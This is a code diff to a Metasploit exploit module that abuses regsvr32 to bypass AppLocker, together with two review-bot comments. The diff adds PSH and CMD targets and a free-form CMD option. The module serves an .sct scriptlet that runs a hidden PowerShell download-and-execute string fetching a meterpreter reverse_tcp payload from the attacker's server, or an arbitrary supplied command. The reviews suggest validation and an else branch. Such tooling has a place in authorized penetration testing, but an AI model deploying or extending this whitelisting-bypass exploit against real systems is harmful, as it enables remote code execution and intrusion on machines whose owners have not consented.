diff --git a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
index eca031fc1a..2dcaaaa5fd 100644
--- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
+++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb
@@ -32,7 +32,10 @@ class MetasploitModule < Msf::Exploit::Remote
 {
 'Payload' => 'windows/meterpreter/reverse_tcp'
 },
- 'Targets' => [['Windows', {}]],
+ 'Targets' => [
+ ['PSH', {}],
+ ['CMD', {}]
+ ],
 'Platform' => %w(win),
 'Arch' => [ARCH_X86, ARCH_X86_64],
 'DefaultTarget' => 0,
@@ -42,6 +45,10 @@ class MetasploitModule < Msf::Exploit::Remote
 ['URL', 'http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html']
 ]
 ))
+ register_options(
+ [
+ OptString.new('CMD',[false, 'The command to execute (For use with the CMD Target option only)',''])
+ ])
 end
@@ -66,15 +73,20 @@ class MetasploitModule < Msf::Exploit::Remote
 def serve_sct_file
 print_status("Handling request for the .sct file from #{cli.peerhost}")
 url = get_uri
- ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
- download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
- download_and_run = "#{ignore_cert}#{download_string}"
- psh_command = generate_psh_command_line(
- noprofile: true,
- windowstyle: 'hidden',
- command: download_and_run
- )
- data = gen_sct_file(psh_command)
+ case target.name
+ when 'PSH'
+ ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
+ download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
+ download_and_run = "#{ignore_cert}#{download_string}"
+ psh_command = generate_psh_command_line(
+ noprofile: true,
+ windowstyle: 'hidden',
+ command: download_and_run
+ )
+ data = gen_sct_file(psh_command)
+ when 'CMD'
+ data = gen_sct_file(datastore['CMD'])
+ end
 send_response(cli, data, 'Content-Type' => 'text/plain')
 end
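Review bot: The new `CMD` option is registered as optional with an empty default, but nothing in this commit checks it when the `CMD` target is selected, so a user who picks that target and forgets the option gets an .sct file generated from `''` in the third hunk with no error reported. Since the option only makes sense for one target it cannot simply be made required; instead validate it where the module starts up (that method is outside this diff) with something like `fail_with(Failure::BadConfig, 'CMD must be set when using the CMD target') if target.name == 'CMD' && datastore['CMD'].blank?`. Minor style point on the same line: `OptString.new('CMD',[false, ...,''])` is missing the spaces after the commas that the rest of the file's option declarations use, and the description would read better as `'The command to execute (CMD target only)'`.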
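Review bot: The `case target.name` in `serve_sct_file` has no `else`, so for any target name other than `'PSH'` or `'CMD'` `data` stays `nil` and `send_response(cli, nil, ...)` is reached with no diagnostic; even though the target list currently only holds those two names, an `else` branch such as `else fail_with(Failure::BadConfig, "Unknown target #{target.name}")` makes the mapping explicit and keeps future target additions from silently serving an empty body. In the `'CMD'` branch the option value is passed to `gen_sct_file` verbatim; `gen_sct_file` is defined outside this hunk, so it is not visible whether it escapes the string for the .sct file's markup, and if it does not, a value containing quotes or angle brackets would produce a malformed file rather than run as intended — worth a comment on the branch stating which escaping responsibility lies with the caller. The `PSH` branch is the pre-existing logic re-indented, so no further change is needed there.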